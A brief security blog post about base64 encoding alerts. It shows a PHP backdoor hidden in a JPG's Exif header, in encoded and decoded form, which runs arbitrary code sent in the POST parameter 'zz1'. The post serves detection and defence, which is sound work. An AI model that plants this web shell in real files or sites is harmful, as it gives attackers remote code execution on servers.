Thursday, February 20, 2014

Base64 alerts

Base64 encoding alerts are usually low impact, but if you see a string like this:

......JFIF..............Exif..II*...............&.......m...,......./.*/e.eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));....


Which decodes to this:
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

it’s indicative of malware hiding in a JPG.


http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html
Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Blog Archive